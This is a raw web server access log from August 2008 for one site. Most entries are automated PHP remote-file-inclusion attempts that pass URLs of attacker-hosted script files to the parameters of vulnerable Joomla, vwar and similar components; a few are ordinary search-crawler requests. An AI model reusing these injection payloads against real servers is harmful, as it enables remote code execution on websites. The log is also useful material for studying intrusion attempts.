66.135.41.76 - - [18/Aug/2008:11:25:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:11:25:45 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:26:15 -0700] "GET /logs/access_080213.log/?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:26:23 -0700] "GET /logs/access_080213.log/?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:11:26:41 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:11:26:47 -0700] "GET /logs/access_080615.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:26:47 -0700] "GET /logs/access_080717.log/home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:26:47 -0700] "GET /home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:11:26:48 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10980 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:11:26:49 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:11:27:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:11:27:12 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:27:13 -0700] "GET /logs/access_080708.log%20//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:27:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:27:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.189.10 - - [18/Aug/2008:11:27:18 -0700] "GET //includes/get_header.php?vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [18/Aug/2008:11:27:18 -0700] "GET /logs/access_080801.log//includes/get_header.php?vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [18/Aug/2008:11:27:18 -0700] "GET /logs//includes/get_header.php?vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [18/Aug/2008:11:27:20 -0700] "GET /logs/access_080121.log//includes/get_header.php?vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [18/Aug/2008:11:27:20 -0700] "GET /logs/access_080725.log//includes/get_header.php?vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:11:27:22 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:11:27:27 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:11:27:27 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:11:27:28 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:11:27:28 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.38 - - [18/Aug/2008:11:27:32 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:27:42 -0700] "GET /logs/access_080717.log/home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:27:42 -0700] "GET /home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:27:43 -0700] "GET /logs/home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.41.130 - - [18/Aug/2008:11:27:52 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:28:16 -0700] "GET /logs/access_080720.log//errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:11:28:27 -0700] "GET /logs/access_080530.log//citywriter/head.php?path=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:11:28:35 -0700] "GET /logs/access_080627.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:11:28:44 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:11:28:44 -0700] "GET /logs/access_080808.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:11:28:50 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:28:50 -0700] "GET /home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.150.189.10 - - [18/Aug/2008:11:28:57 -0700] "GET /logs/access_080518.log//includes/get_header.php?vwar_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:11:29:02 -0700] "GET /logs/access_080808.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:11:29:02 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:11:29:02 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:29:18 -0700] "GET /logs/?sourcedir=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 200 61141 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:29:20 -0700] "GET /?sourcedir=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 200 10977 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.189.205 - - [18/Aug/2008:11:29:33 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [18/Aug/2008:11:29:34 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 11066 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:11:29:36 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.64.112.75 - - [18/Aug/2008:11:29:54 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [18/Aug/2008:11:29:55 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 11050 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:30:35 -0700] "GET /logs/phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:30:36 -0700] "GET /phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [18/Aug/2008:11:30:57 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://fan.simplified-evolution.net//tmp6/Za/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
205.234.200.223 - - [18/Aug/2008:11:30:57 -0700] "GET /modules/My_eGallery/index.php?basepath=http://fan.simplified-evolution.net//tmp6/Za/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:11:31:09 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:11:31:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:11:31:09 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:31:14 -0700] "GET /logs/access_080219.log//vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:31:14 -0700] "GET //vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:31:14 -0700] "GET /logs//vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:31:15 -0700] "GET /logs/access_080219.log//vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:31:15 -0700] "GET //vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:31:15 -0700] "GET /logs//vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.218 - - [18/Aug/2008:11:31:30 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:31:40 -0700] "GET /logs/home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:31:41 -0700] "GET /home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:31:41 -0700] "GET /logs/home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [18/Aug/2008:11:31:42 -0700] "GET /home.php?content=www.unixserv.net/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:11:32:43 -0700] "GET /logs/access_080627.log//citywriter/head.php?path=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:33:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:33:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:33:16 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:33:16 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:34:31 -0700] "GET /logs/access_080313.log/?sourcedir=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:34:33 -0700] "GET /?sourcedir=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 200 10977 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:34:34 -0700] "GET /logs/?sourcedir=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 200 61141 "-" "libwww-perl/5.808" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:35:23 -0700] "GET /logs/access_080714.log/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:35:23 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:35:24 -0700] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:35:29 -0700] "GET /logs/access_080122.log/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:35:29 -0700] "GET /logs/access_080122.log/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:35:29 -0700] "GET /errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:35:29 -0700] "GET /errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:35:29 -0700] "GET /logs/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:35:29 -0700] "GET /logs/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.88.22.117 - - [18/Aug/2008:11:35:36 -0700] "GET / HTTP/1.1" 200 10821 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.dmulk.com"
77.88.22.117 - - [18/Aug/2008:11:35:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.dmulk.com"
77.88.22.117 - - [18/Aug/2008:11:35:39 -0700] "GET / HTTP/1.1" 200 10817 "-" "Yandex/1.01.001 (compatible; Win16; H)" "dmulk.com"
77.88.22.117 - - [18/Aug/2008:11:35:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; H)" "dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:35:42 -0700] "GET /logs/access_080713.log/?sourcedir=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.88.22.117 - - [18/Aug/2008:11:35:43 -0700] "GET /?show=gallery&pageid=169 HTTP/1.1" 200 19232 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.dmulk.com"
77.88.22.117 - - [18/Aug/2008:11:35:45 -0700] "GET /?show=gallery&pageid=169 HTTP/1.1" 200 19228 "-" "Yandex/1.01.001 (compatible; Win16; H)" "dmulk.com"
66.135.41.76 - - [18/Aug/2008:11:35:46 -0700] "GET /logs/access_080708.log%20//modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.64.112.75 - - [18/Aug/2008:11:36:00 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [18/Aug/2008:11:36:01 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 11080 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.73.189.205 - - [18/Aug/2008:11:36:18 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [18/Aug/2008:11:36:19 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 11080 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:36:54 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:36:58 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:36:59 -0700] "GET /logs/access_080808.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:37:30 -0700] "GET /logs/access_080218.log//vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:37:34 -0700] "GET /logs/access_080218.log//vwar/backup/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:37:35 -0700] "GET /logs/access_080808.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:37:35 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:37:35 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:11:37:42 -0700] "GET /logs/access_071009.log HTTP/1.0" 200 26112 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
141.44.140.111 - - [18/Aug/2008:11:37:44 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:37:56 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:37:57 -0700] "GET /lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:38:09 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:38:10 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:38:10 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:38:36 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:38:37 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:38:37 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:11:38:38 -0700] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://adamari.net/img/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.197.68.66 - - [18/Aug/2008:11:39:30 -0700] "GET /logs/access_080621.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.22 - - [18/Aug/2008:11:40:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
